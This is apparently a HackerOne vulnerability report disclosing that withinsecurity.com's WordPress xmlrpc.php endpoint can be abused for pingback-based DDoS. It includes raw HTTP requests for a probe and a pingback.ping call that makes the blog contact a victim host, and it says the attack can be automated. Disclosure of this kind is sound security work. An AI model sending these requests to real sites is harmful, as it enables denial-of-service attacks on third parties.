withinsecurity: DDOS using xmlrpc.php

ID H1:96294
Type hackerone
Reporter anshuman_bh
Modified 2015-10-29T19:28:24


Wordpress blogs that have xmlrpc.php enabled for pingbacks, trackbacks, etc. can be made as a part of a huge botnet causing a major DDOS. The blog at withinsecurity.com has the xmlrpc.php file enabled and could thus be potentially used for such an attack against other victim hosts.

  • In order to determine whether the xmlrpc.php file is enabled or not, using the Repeater tab in Burp, send the request below. See screenshot 1:

``` POST /xmlrpc.php HTTP/1.1 Host: withinsecurity.com Connection: keep-alive Content-Length: 175

<?xml version="1.0" encoding="utf-8"?> <methodCall> <methodName>demo.sayHello</methodName> <params> <param> <value>admin</value> </param> </params> </methodCall> ```

  • Notice that a successful response is received showing that the xmlrpc.php file is enabled.

  • Now, considering the blog post https://withinsecurity.com/2015/10/is-there-really-a-cybersecurity-skills-gap/ on the withinsecurity.com domain, the xmlrpc.php file discussed above could potentially be abused to cause a DDOS attack against a victim host. This is achieved by simply sending a request that looks like below. See Screenshot 2:

``` POST /xmlrpc.php HTTP/1.1 Host: withinsecurity.com Connection: keep-alive Content-Length: 293

<methodCall> <methodName>pingback.ping</methodName> <params> <param> <value><string></string></value> </param> <param> <value><string>https://withinsecurity.com/2015/10/is-there-really-a-cybersecurity-skills-gap/</string></value> </param> </params> </methodCall> ```

  • As soon as the above request is sent, the victim host ( gets an entry in its log file with a request originating from the withinsecurity.com domain verifying the pingback. See screenshot 3.

This can be automated from multiple hosts and be used to cause a mass DDOS attack on the victim.